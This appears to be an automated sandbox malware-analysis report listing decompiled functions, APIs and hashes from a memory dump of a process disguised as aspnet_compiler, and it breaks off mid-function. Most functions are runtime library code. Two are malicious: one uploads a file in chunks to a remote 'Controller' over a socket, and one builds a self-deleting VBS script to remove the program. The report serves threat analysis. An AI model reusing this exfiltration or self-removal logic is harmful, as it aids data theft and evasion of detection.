                Uniqueness Score: -1.00%

                C-Code - Quality: 91%
                			E00444657(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                				signed int _v8;
                				char _v21;
                				intOrPtr _v22;
                				struct _cpinfo _v28;
                				void* _v32;
                				void* _v36;
                				void* _v40;
                				intOrPtr* _v44;
                				signed int _v48;
                				void* _v52;
                				signed int* _v56;
                				intOrPtr _v60;
                				intOrPtr* _v64;
                				signed int* _v68;
                				void* _v72;
                				char _v76;
                				signed int _t101;
                				signed int _t123;
                				signed short _t126;
                				void* _t130;
                				void* _t134;
                				void* _t137;
                				void* _t138;
                				intOrPtr _t139;
                				void* _t141;
                				signed int _t142;
                				intOrPtr* _t143;
                				signed char _t160;
                				signed char _t165;
                				signed int _t166;
                				void* _t168;
                				signed int _t170;
                				void* _t179;
                				signed int* _t180;
                				signed int* _t181;
                				signed int _t182;
                				signed char* _t189;
                				signed char* _t190;
                				signed int _t192;
                				void* _t193;
                				intOrPtr _t197;
                				short* _t209;
                				intOrPtr* _t211;
                				intOrPtr* _t215;
                				signed int _t216;
                				signed int _t217;
                				void* _t218;
                				void* _t219;
                
                				_t101 =  *0x46f00c; // 0xd60a1515
                				_v8 = _t101 ^ _t217;
                				_t211 = _a4;
                				_t170 = 0;
                				_v64 = _t211;
                				_v32 = 0;
                				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
                				_v36 = 0;
                				_v40 = 0;
                				_v52 = 0;
                				_v76 = _t211;
                				_v72 = 0;
                				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
                					__eflags =  *(_t211 + 0x8c);
                					if( *(_t211 + 0x8c) != 0) {
                						asm("lock dec dword [eax]");
                					}
                					 *(_t211 + 0x8c) = _t170;
                					__eflags = 0;
                					 *(_t211 + 0x90) = _t170;
                					 *_t211 = 0x45b890;
                					 *((intOrPtr*)(_t211 + 0x94)) = 0x45bb10;
                					 *((intOrPtr*)(_t211 + 0x98)) = 0x45bc90;
                					 *((intOrPtr*)(_t211 + 4)) = 1;
                					L41:
                					return E004338BB(_v8 ^ _t217);
                				}
                				_t106 = _t211 + 8;
                				_v44 = 0;
                				if( *(_t211 + 8) != 0) {
                					L3:
                					_v44 = E004443F4(_t172, 1, 4);
                					E00445002(_t170);
                					_v32 = E004443F4(_t172, 0x180, 2);
                					E00445002(_t170);
                					_v36 = E004443F4(_t172, 0x180, 1);
                					E00445002(_t170);
                					_v40 = E004443F4(_t172, 0x180, 1);
                					E00445002(_t170);
                					_t197 = E004443F4(_t172, 0x101, 1);
                					_v52 = _t197;
                					E00445002(_t170);
                					_t219 = _t218 + 0x3c;
                					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
                						L36:
                						E00445002(_v44);
                						E00445002(_v32);
                						E00445002(_v36);
                						E00445002(_v40);
                						_t170 = 1;
                						__eflags = 1;
                						goto L37;
                					} else {
                						_t123 = _t170;
                						do {
                							 *(_t123 + _t197) = _t123;
                							_t123 = _t123 + 1;
                						} while (_t123 < 0x100);
                						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
                							goto L36;
                						}
                						_t126 = _v28;
                						_t235 = _t126 - 5;
                						if(_t126 > 5) {
                							goto L36;
                						}
                						_t28 = _t197 + 1; // 0x1
                						_v48 = _t126 & 0x0000ffff;
                						_t192 = 0xff;
                						_t130 = E004496E6(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
                						_t219 = _t219 + 0x24;
                						_t236 = _t130;
                						if(_t130 == 0) {
                							goto L36;
                						}
                						_t34 = _t197 + 1; // 0x1
                						_t134 = E004496E6(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
                						_t219 = _t219 + 0x24;
                						if(_t134 == 0) {
                							goto L36;
                						}
                						if(_v48 <= 1 || _v22 == _t170) {
                							L22:
                							_v60 = _v32 + 0x100;
                							_t137 = E0044F9AC(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
                							_t219 = _t219 + 0x1c;
                							if(_t137 == 0) {
                								goto L36;
                							}
                							_t193 = _v32;
                							_t138 = _t193 + 0xfe;
                							 *_t138 = 0;
                							_t179 = _v36;
                							_v32 = _t138;
                							_t139 = _v40;
                							 *(_t179 + 0x7f) = _t170;
                							_t180 = _t179 - 0xffffff80;
                							 *(_t139 + 0x7f) = _t170;
                							_v68 = _t180;
                							 *_t180 = _t170;
                							_t181 = _t139 + 0x80;
                							_v56 = _t181;
                							 *_t181 = _t170;
                							if(_v48 <= 1 || _v22 == _t170) {
                								L32:
                								_t182 = 0x3f;
                								memcpy(_t193, _t193 + 0x200, _t182 << 2);
                								_push(0x1f);
                								asm("movsw");
                								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
                								_push(0x1f);
                								asm("movsw");
                								asm("movsb");
                								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
                								asm("movsw");
                								asm("movsb");
                								_t215 = _v64;
                								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
                									asm("lock xadd [ecx], eax");
                									if((_t142 | 0xffffffff) == 0) {
                										E00445002( *(_t215 + 0x90) - 0xfe);
                										E00445002( *(_t215 + 0x94) - 0x80);
                										E00445002( *(_t215 + 0x98) - 0x80);
                										E00445002( *((intOrPtr*)(_t215 + 0x8c)));
                									}
                								}
                								_t143 = _v44;
                								 *_t143 = 1;
                								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
                								 *_t215 = _v60;
                								 *(_t215 + 0x90) = _v32;
                								 *(_t215 + 0x94) = _v68;
                								 *(_t215 + 0x98) = _v56;
                								 *(_t215 + 4) = _v48;
                								L37:
                								E00445002(_v52);
                								goto L41;
                							} else {
                								_t189 =  &_v21;
                								while(1) {
                									_t160 =  *_t189;
                									if(_t160 == 0) {
                										break;
                									}
                									_t216 =  *(_t189 - 1) & 0x000000ff;
                									if(_t216 > (_t160 & 0x000000ff)) {
                										L30:
                										_t189 =  &(_t189[2]);
                										if( *(_t189 - 1) != _t170) {
                											continue;
                										}
                										break;
                									}
                									_t209 = _t193 + 0x100 + _t216 * 2;
                									do {
                										_t216 = _t216 + 1;
                										 *_t209 = 0x8000;
                										_t209 = _t209 + 2;
                									} while (_t216 <= ( *_t189 & 0x000000ff));
                									goto L30;
                								}
                								goto L32;
                							}
                						} else {
                							_t190 =  &_v21;
                							while(1) {
                								_t165 =  *_t190;
                								if(_t165 == 0) {
                									goto L22;
                								}
                								_t192 =  *(_t190 - 1) & 0x000000ff;
                								_t166 = _t165 & 0x000000ff;
                								while(_t192 <= _t166) {
                									 *((char*)(_t192 + _t197)) = 0x20;
                									_t192 = _t192 + 1;
                									__eflags = _t192;
                									_t166 =  *_t190 & 0x000000ff;
                								}
                								_t190 =  &(_t190[2]);
                								_t242 =  *(_t190 - 1) - _t170;
                								if( *(_t190 - 1) != _t170) {
                									continue;
                								}
                								goto L22;
                							}
                							goto L22;
                						}
                					}
                				}
                				_t168 = E004516F4(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
                				_t219 = _t218 + 0x14;
                				if(_t168 != 0) {
                					goto L36;
                				}
                				goto L3;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$Info
                • String ID:
                • API String ID: 2509303402-0
                • Opcode ID: a8cc77335abd681ecdd4907e4e1c8762169d6c95eeac57854194a817c881b2f5
                • Instruction ID: ad40bc67768ff577a85139c61b858be7675e1a203c69b77c022c2f93fc340f39
                • Opcode Fuzzy Hash: a8cc77335abd681ecdd4907e4e1c8762169d6c95eeac57854194a817c881b2f5
                • Instruction Fuzzy Hash: D5B1AFB1900245AFEB20DF79C881BAFBBF4BF49304F14406EF495A7352DB7998419B64
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0044FB46(intOrPtr _a4) {
                				intOrPtr _v8;
                				intOrPtr _t25;
                				intOrPtr* _t26;
                				intOrPtr _t28;
                				intOrPtr* _t29;
                				intOrPtr* _t31;
                				intOrPtr* _t45;
                				intOrPtr* _t46;
                				intOrPtr* _t47;
                				intOrPtr* _t55;
                				intOrPtr* _t70;
                				intOrPtr _t74;
                
                				_t74 = _a4;
                				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                				if(_t25 != 0 && _t25 != 0x46f188) {
                					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                					if(_t45 != 0 &&  *_t45 == 0) {
                						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                						if(_t46 != 0 &&  *_t46 == 0) {
                							E00445002(_t46);
                							E0044ED82( *((intOrPtr*)(_t74 + 0x88)));
                						}
                						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                						if(_t47 != 0 &&  *_t47 == 0) {
                							E00445002(_t47);
                							E0044F23C( *((intOrPtr*)(_t74 + 0x88)));
                						}
                						E00445002( *((intOrPtr*)(_t74 + 0x7c)));
                						E00445002( *((intOrPtr*)(_t74 + 0x88)));
                					}
                				}
                				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                				if(_t26 != 0 &&  *_t26 == 0) {
                					E00445002( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                					E00445002( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                					E00445002( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                					E00445002( *((intOrPtr*)(_t74 + 0x8c)));
                				}
                				E0044FCB9( *((intOrPtr*)(_t74 + 0x9c)));
                				_t28 = 6;
                				_t55 = _t74 + 0xa0;
                				_v8 = _t28;
                				_t70 = _t74 + 0x28;
                				do {
                					if( *((intOrPtr*)(_t70 - 8)) != 0x46f2a8) {
                						_t31 =  *_t70;
                						if(_t31 != 0 &&  *_t31 == 0) {
                							E00445002(_t31);
                							E00445002( *_t55);
                						}
                						_t28 = _v8;
                					}
                					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                						_t22 = _t70 - 4; // 0xffffcf90
                						_t29 =  *_t22;
                						if(_t29 != 0 &&  *_t29 == 0) {
                							E00445002(_t29);
                						}
                						_t28 = _v8;
                					}
                					_t55 = _t55 + 4;
                					_t70 = _t70 + 0x10;
                					_t28 = _t28 - 1;
                					_v8 = _t28;
                				} while (_t28 != 0);
                				return E00445002(_t74);
                			}

                APIs
                • ___free_lconv_mon.LIBCMT ref: 0044FB8A
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044ED9F
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDB1
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDC3
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDD5
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDE7
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDF9
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE0B
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE1D
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE2F
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE41
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE53
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE65
                  • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE77
                • _free.LIBCMT ref: 0044FB7F
                  • Part of subcall function 00445002: HeapFree.KERNEL32(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                  • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                • _free.LIBCMT ref: 0044FBA1
                • _free.LIBCMT ref: 0044FBB6
                • _free.LIBCMT ref: 0044FBC1
                • _free.LIBCMT ref: 0044FBE3
                • _free.LIBCMT ref: 0044FBF6
                • _free.LIBCMT ref: 0044FC04
                • _free.LIBCMT ref: 0044FC0F
                • _free.LIBCMT ref: 0044FC47
                • _free.LIBCMT ref: 0044FC4E
                • _free.LIBCMT ref: 0044FC6B
                • _free.LIBCMT ref: 0044FC83
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID:
                • API String ID: 161543041-0
                • Opcode ID: b7ef605ccd965c869b2e05edb79bfb80bd9a0298b636961e3ec43af93a1375b9
                • Instruction ID: 3ab02cf78170ad634f8d0de65b9125c41ac80f736b079e9f2e4498fa10b99b54
                • Opcode Fuzzy Hash: b7ef605ccd965c869b2e05edb79bfb80bd9a0298b636961e3ec43af93a1375b9
                • Instruction Fuzzy Hash: 28316D71500A069FFF309A3AE846B5B73E8FF01318F10842FE498D6252DB39EC448B58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E004081EE(void* __ecx, char _a4, char _a8, char _a28, void* _a32, char _a52) {
                				char _v12;
                				void* _v16;
                				char _v28;
                				void* _v40;
                				char _v52;
                				void* _v56;
                				char _v64;
                				char _v76;
                				void* _v80;
                				char _v100;
                				void* _v104;
                				char _v116;
                				char _v124;
                				char _v128;
                				signed int _v140;
                				char _v144;
                				char _v148;
                				struct %anon52 _v156;
                				char _v164;
                				void* _v168;
                				struct %anon52 _v176;
                				union _LARGE_INTEGER* _v180;
                				void* _v184;
                				intOrPtr _v188;
                				long _v192;
                				signed int _v196;
                				intOrPtr _v200;
                				union _LARGE_INTEGER* _v204;
                				union _LARGE_INTEGER _v208;
                				intOrPtr _v216;
                				intOrPtr _v220;
                				long _v224;
                				signed int _v228;
                				intOrPtr _v236;
                				signed int _v244;
                				intOrPtr _v248;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				void* _t94;
                				void* _t101;
                				void* _t111;
                				void* _t113;
                				void* _t121;
                				signed int _t134;
                				void* _t135;
                				signed int _t136;
                				void* _t146;
                				void* _t150;
                				void* _t161;
                				void* _t164;
                				signed int _t167;
                				struct _OVERLAPPED* _t169;
                				struct %anon52 _t192;
                				signed int _t208;
                				void* _t214;
                				union _LARGE_INTEGER* _t247;
                				void* _t255;
                				void* _t256;
                				union _LARGE_INTEGER _t261;
                				void* _t262;
                				void* _t264;
                				void* _t265;
                				void* _t267;
                				void* _t268;
                				void* _t269;
                				void* _t270;
                				void* _t271;
                				void* _t276;
                
                				_t266 =  &_v184;
                				_v140 = _v140 & 0x00000000;
                				_t255 = __ecx;
                				_v176.LowPart = 0x186a0;
                				if(_a4 != 0) {
                					_t161 = E00406E3A(0x46a8f0);
                					_t278 = _t161;
                					if(_t161 != 0) {
                						_t276 =  &_v184 - 0x18;
                						E004086D0(_t167, _t276, 0x46a8f0, _t278,  &_a8);
                						_t164 = E00419F8D(_t167,  &_v52, 0x46a8f0, _t264);
                						_t266 = _t276 + 0x18;
                						E00401EF3( &_a28, 0x46a8f0, _t256, _t164);
                						E00401EE9();
                					}
                				}
                				E0040480D(_t255);
                				E004048A8(_t255, _t256, _t255);
                				_t94 = E0041A879(_t167,  &_v124,  &_a28);
                				_t267 = _t266 - 0x18;
                				_t246 = E00402EF0(_t167,  &_v52, E00402EF0(_t167,  &_v28, E00402EF0(_t167,  &_v100, E0041A879(_t167,  &_v76,  &_a4), _t264, _t278, 0x472ec8), _t264, _t278,  &_a52), _t264, _t278, 0x472ec8);
                				E00402E81(_t267, _t99, _t94);
                				_push(0xb6);
                				_t101 = E00404A81(_t255, _t99, _t278);
                				E00401FB8();
                				E00401FB8();
                				E00401FB8();
                				E00401FB8();
                				E00401FB8();
                				if((_t167 & 0xffffff00 | _t101 == 0xffffffff) == 0) {
                					_t169 = 0;
                					_t265 = CreateFileW(E00401EE4( &_v12), 0x80000000, 1, 0, 3, 0x80, 0);
                					__eflags = _t265 - 0xffffffff;
                					if(__eflags != 0) {
                						_v148 = 0;
                						_v144 = 0;
                						__imp__GetFileSizeEx( &_v148);
                						_t247 = _v156.HighPart;
                						_t192 = _v156;
                						_v176 = _t192;
                						_v180 = _t247;
                						_v208.LowPart = _t192;
                						_v200 = _t247;
                						_v196 = 1;
                						_v192 = 0;
                						_t111 = E00455B00(_t192, _t247, 0x186a0, 0);
                						asm("adc edx, ebx");
                						_t113 = E0041A723(0,  &_v140, _t247, _t111 + 1, _t247);
                						_t268 = _t267 - 0x10;
                						E00402E81(_t268, E00402EF0(0,  &_v164, E0041A723(0,  &_v116, _t247, _v192, _v196), _t265, __eflags, 0x472ec8), _t113);
                						E00404A81(_t255, _t115, __eflags, 0xb7, _t265);
                						E00401FB8();
                						E00401FB8();
                						E00401FB8();
                						_t121 = E0041A819( &_v192,  &_v64);
                						_t269 = _t268 - 0x18;
                						_t251 = "Uploading file to Controller: ";
                						E004052DD(0, _t269, "Uploading file to Controller: ", _t265, __eflags, _t121);
                						_t270 = _t269 - 0x14;
                						E00402073(0, _t270, "Uploading file to Controller: ", _t265, "i");
                						E0041A04A(0, _t255);
                						_t271 = _t270 + 0x30;
                						_t208 =  &_v196;
                						E00401FB8();
                						asm("xorps xmm0, xmm0");
                						asm("movlpd [esp+0x40], xmm0");
                						__eflags = _v228;
                						if(__eflags < 0) {
                							L22:
                							CloseHandle(_t265);
                							E00404E06(_t251);
                							_t169 = 1;
                							goto L23;
                						}
                						if(__eflags > 0) {
                							L11:
                							_t261 = 0;
                							__eflags = 0;
                							_v204 = _v180;
                							_v208.LowPart = _v184;
                							_t134 = 0x186a0;
                							goto L12;
                							do {
                								do {
                									L12:
                									_t246 = _v220;
                									__eflags = _t261 - _t246;
                									if(__eflags < 0) {
                										L16:
                										_push(_t134);
                										_t135 = E004330A3(_t208, _t246, _t261, __eflags);
                										_push(_t169);
                										_t262 = _t135;
                										_v192 = _t169;
                										_v184 = _t262;
                										_t136 = SetFilePointerEx(_t265, _v208.LowPart, _v204, _t169);
                										__eflags = _t136;
                										if(_t136 == 0) {
                											_t272 = _t271 - 0x18;
                											_t214 = _t271 - 0x18;
                											_push("SetFilePointerEx error");
                											L27:
                											E00402073(_t169, _t214, _t246, _t265);
                											E00402073(_t169, _t272 - 0x18, _t246, _t265, "E");
                											E0041A04A(_t169, _t255);
                											E004330AC(_t262);
                											CloseHandle(_t265);
                											L28:
                											E00404E06(_t246);
                											goto L23;
                										}
                										__eflags = ReadFile(_t265, _t262, _v224,  &_v192, _t169);
                										if(__eflags == 0) {
                											_t272 = _t271 - 0x18;
                											_t214 = _t271 - 0x18;
                											_push("ReadFile error");
                											goto L27;
                										}
                										_t146 = E00402097(_t169,  &_v144, _t246, _t265, __eflags, _t262, _v192);
                										_t271 = _t271 - 0x18;
                										_t253 = E00402EF0(_t169,  &_v176, E0041A723(_t169,  &_v128, _t246, _v224, _v220), _t265, __eflags, 0x472ec8);
                										E00402E81(_t271, _t148, _t146);
                										_push(0x52);
                										_t150 = E00404A81(_t255, _t148, __eflags);
                										__eflags = _t150 - 0xffffffff;
                										E00401FB8();
                										E00401FB8();
                										E00401FB8();
                										__eflags = _t169 & 0xffffff00 | _t150 == 0xffffffff;
                										if((_t169 & 0xffffff00 | _t150 == 0xffffffff) != 0) {
                											E00404E06(_t253);
                											CloseHandle(_t265);
                											E004330AC(_v204);
                											goto L5;
                										}
                										goto L19;
                									}
                									_t208 = _v228;
                									if(__eflags > 0) {
                										L15:
                										_t134 = _t208;
                										_v188 = _t246;
                										_v224 = _t134;
                										goto L16;
                									}
                									__eflags = _t134 - _t208;
                									if(__eflags <= 0) {
                										goto L16;
                									}
                									goto L15;
                									L19:
                									E004330AC(_v204);
                									_t134 = _v244;
                									_v248 = _v248 - _t134;
                									_t261 = _v208;
                									asm("sbb [esp+0x20], esi");
                									_v236 = _v236 + 1;
                									_t251 = _v224;
                									_t169 = 0;
                									asm("adc [esp+0x24], ebx");
                									_t208 = _v228 + _t134;
                									_v228 = _t208;
                									asm("adc edx, esi");
                									_v224 = _t251;
                									__eflags = _t251 - _v220;
                								} while (__eflags < 0);
                								if(__eflags > 0) {
                									goto L22;
                								}
                								__eflags = _t208 - _v216;
                							} while (_t208 < _v216);
                							goto L22;
                						}
                						__eflags = _v196;
                						if(_v196 <= 0) {
                							goto L22;
                						}
                						goto L11;
                					}
                					E00402073(0, _t267 - 0x18, _t246, _t265, 0x464074);
                					_push(0x53);
                					E00404A81(_t255, _t246, __eflags);
                					goto L28;
                				} else {
                					E00404E06(_t246);
                					L5:
                					_t169 = 0;
                					L23:
                					E00401EE9();
                					E00401EE9();
                					E00401FB8();
                					return _t169;
                				}
                			}

                APIs
                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408357
                • GetFileSizeEx.KERNEL32(00000000,?), ref: 0040838F
                • __aulldiv.LIBCMT ref: 004083C1
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 004084E4
                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004084FF
                • CloseHandle.KERNEL32(00000000), ref: 004085D8
                • CloseHandle.KERNEL32(00000000,00000052), ref: 00408622
                • CloseHandle.KERNEL32(00000000), ref: 00408670
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                • API String ID: 3086580692-2596673759
                • Opcode ID: 083f2e6c64cd084b7695d2d8b84ee30fbdaf5cb9a0a83046b1f80f092be4087f
                • Instruction ID: 2e3c2baa84d0001f6d92d6a12086262f6ba3ffa6ab37ef3033deaea4bc0aa555
                • Opcode Fuzzy Hash: 083f2e6c64cd084b7695d2d8b84ee30fbdaf5cb9a0a83046b1f80f092be4087f
                • Instruction Fuzzy Hash: 31B1C1316083409BC314FB65C981AAFB7E9AFC4354F40492FF489622D2EF789945CB9B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040CD03(void* __ebx, void* __eflags) {
                				char _v28;
                				char _v52;
                				char _v76;
                				char _v100;
                				char _v124;
                				char _v148;
                				char _v172;
                				char _v196;
                				short _v716;
                				void* __edi;
                				void* __ebp;
                				void* _t36;
                				void* _t37;
                				void* _t40;
                				void* _t54;
                				void* _t67;
                				void* _t68;
                				void* _t79;
                				void* _t137;
                
                				_t79 = __ebx;
                				E00411D93();
                				_t36 = E0040245C();
                				_t37 = E00401F8B(0x473280);
                				_t40 = E004129E0(E00401F8B(0x473238), "exepath",  &_v716, 0x208, _t37, _t36);
                				_t141 = _t40;
                				if(_t40 == 0) {
                					GetModuleFileNameW(0,  &_v716, 0x208);
                				}
                				E00402FF4(_t79,  &_v124, E0041A7B9( &_v52, E0041A4D3( &_v76)), 0, _t137, _t141, L".vbs");
                				E00401EE9();
                				E00401FB8();
                				E004042FD(_t79,  &_v100, E00402FF4(_t79,  &_v76, E0040415E(_t79,  &_v52, _t42, _t137, E0043A99F(_t79,  &_v76, _t141, L"Temp")), 0, _t137, _t141, "\\"), _t137, _t141,  &_v124);
                				E00401EE9();
                				E00401EE9();
                				E00401F66(_t79,  &_v28);
                				_t54 = E0040415E(_t79,  &_v196, _t49, _t137, L"\"\"\", 0");
                				E0040323D(E00402FF4(_t79,  &_v76, E00402F85( &_v52, E00402FF4(_t79,  &_v148, E0040415E(_t79,  &_v172, _t49, _t137, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t137, _t141,  &_v716), _t54), 0, _t137, _t141, "\n"));
                				E00401EE9();
                				E00401EE9();
                				E00401EE9();
                				E00401EE9();
                				E00401EE9();
                				L004086C6(_t79,  &_v28, 0, _t137, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
                				_t67 = E00401EE4( &_v100);
                				_t68 = E0040245C();
                				E00401EE4( &_v28);
                				if(E0041AD6A(_t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", E00401EE4( &_v100), 0x46a8f0, 0x46a8f0, 0) > 0x20) {
                					ExitProcess(0);
                				}
                				E00401EE9();
                				E00401EE9();
                				return E00401EE9();
                			}

                APIs
                  • Part of subcall function 00411D93: TerminateProcess.KERNEL32(00000000,pth_unenc,0040EE0B), ref: 00411DA3
                  • Part of subcall function 00411D93: WaitForSingleObject.KERNEL32(000000FF), ref: 00411DB6
                  • Part of subcall function 004129E0: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00473238), ref: 004129FC
                  • Part of subcall function 004129E0: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412A15
                  • Part of subcall function 004129E0: RegCloseKey.ADVAPI32(00000000), ref: 00412A20
                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040CD5D
                • ShellExecuteW.SHELL32(00000000,open,00000000,0046A8F0,0046A8F0,00000000), ref: 0040CEBC
                • ExitProcess.KERNEL32 ref: 0040CEC8
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                • String ID: """, 0$.vbs$82G$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                • API String ID: 1913171305-4128442165
                • Opcode ID: cdd023095726231c7c12aae242b21c22803419696d2755be4f4e3bfbff4b2c5f
                • Instruction ID: 0874bc144836ff93359e0d920a8661d2d2bf12b9c69f7d2e1fc1beb4cd6de9cb
                • Opcode Fuzzy Hash: cdd023095726231c7c12aae242b21c22803419696d2755be4f4e3bfbff4b2c5f
                • Instruction Fuzzy Hash: C9414F319101185ACB14F7A2DC96DEE77B9AF50708F10017FF506B21E2EE385A4ACA99
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 97%
                			E0044EE80(void* __edx, char _a4) {
                				void* _v8;
                				void* _v12;
                				signed int _v16;
                				intOrPtr* _v20;
                				signed int _v24;
                				char _v28;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t105;
                				char _t195;
                				char _t210;
                				signed int _t213;
                				void* _t224;
                				char* _t226;
                				signed int _t227;
                				signed int _t231;
                				signed int _t232;
                				void* _t234;
                				void* _t236;
                				signed int _t237;
                				signed int _t238;
                				signed int _t239;
                				signed int _t240;
                				signed int _t241;
                				signed int _t242;
                				signed int _t243;
                				signed int _t244;
                				signed int _t245;
                				signed int _t246;
                				signed int _t247;
                				signed int _t248;
                				signed int _t249;
                				signed int _t250;
                				signed int _t251;
                				signed int _t252;
                				signed int _t253;
                				signed int _t254;
                				signed int _t255;
                				signed int _t256;
                				char* _t257;
                
                				_t224 = __edx;
                				_t210 = _a4;
                				_v16 = 0;
                				_v28 = _t210;
                				_v24 = 0;
                				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
                					_t234 = E004443F4(0, 1, 0x50);
                					_v8 = _t234;
                					E00445002(0);
                					if(_t234 != 0) {
                						_t227 = E004443F4(0, 1, 4);
                						_v12 = _t227;
                						E00445002(0);
                						if(_t227 != 0) {
                							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
                								_t213 = 0x14;
                								memcpy(_v8, 0x46f188, _t213 << 2);
                								L25:
                								_t236 = _v8;
                								_t231 = _v16;
                								 *_t236 =  *( *(_t210 + 0x88));
                								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
                								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
                								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
                								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
                								 *_v12 = 1;
                								if(_t231 != 0) {
                									 *_t231 = 1;
                								}
                								goto L27;
                							}
                							_t232 = E004443F4(0, 1, 4);
                							_v16 = _t232;
                							E00445002(0);
                							if(_t232 != 0) {
                								_t233 =  *((intOrPtr*)(_t210 + 0xac));
                								_t14 = _t234 + 0xc; // 0xc
                								_t237 = E004516F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
